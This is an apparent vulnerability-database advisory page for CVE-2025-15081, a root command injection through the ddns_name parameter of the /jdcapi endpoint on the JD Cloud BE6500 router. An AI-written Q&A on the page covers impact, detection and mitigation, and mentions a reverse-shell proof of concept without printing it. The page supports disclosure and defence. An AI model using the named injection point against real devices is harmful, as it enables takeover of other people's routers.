CVE-2025-15081
Remote Command Injection in JD Cloud BE6500 sub_4780 Function
Publication date: 2025-12-25
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| jd_cloud | be6500 | 4.4.1.r4308 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-15081 is a command injection vulnerability in the JD Cloud BE6500 device firmware version 4.4.1.r4308. It occurs in the function sub_4780 within the /jdcapi endpoint, where the ddns_name parameter is not properly sanitized. This allows an attacker to inject arbitrary system commands that get executed with root privileges. The vulnerability can be exploited remotely by sending specially crafted requests, leading to full system compromise. [1, 2, 3]
How can this vulnerability impact me? :
Exploiting this vulnerability allows an attacker to execute arbitrary commands on the affected device with root privileges. This can lead to full device compromise, including unauthorized access, control over the system, data theft, disruption of services, and potentially using the device as a foothold for further attacks within a network. [1, 2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious POST requests to the /jdcapi endpoint containing the ddns_name parameter with unusual or command injection payloads. A proof-of-concept exploit involves sending a JSON payload with ddns_name set to a command such as a reverse shell. Network detection can include inspecting HTTP traffic for such payloads. On the device, checking logs for unexpected command executions or reverse shell connections may help. Specific commands to detect exploitation attempts are not provided in the resources. [1, 2, 3]
What immediate steps should I take to mitigate this vulnerability?
No vendor patch or mitigation is currently available for this vulnerability. Immediate steps include restricting network access to the affected device, especially blocking access to the /jdcapi endpoint from untrusted networks, monitoring for suspicious activity, and considering replacement of the affected product. Since the vulnerability allows remote command execution with root privileges, isolating the device and applying network-level controls are critical until a fix is available. [3]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows remote attackers to execute arbitrary commands with root privileges on the affected device, leading to full system compromise. This can result in unauthorized access to sensitive data, impacting confidentiality, integrity, and availability. Such a compromise can lead to non-compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches. However, no specific compliance impact or regulatory assessment is detailed in the provided resources. [1, 3]